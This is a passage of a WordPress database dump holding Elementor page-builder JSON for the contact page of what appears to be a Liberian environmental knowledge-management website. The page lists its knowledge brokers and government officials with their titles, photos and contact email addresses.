\\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23186,3357,'_elementor_edit_mode','builder'),(23187,3357,'_elementor_template_type','wp-page'),(23188,3357,'_elementor_version','3.0.16'),(23189,3357,'_wp_page_template','default'),(23190,3357,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\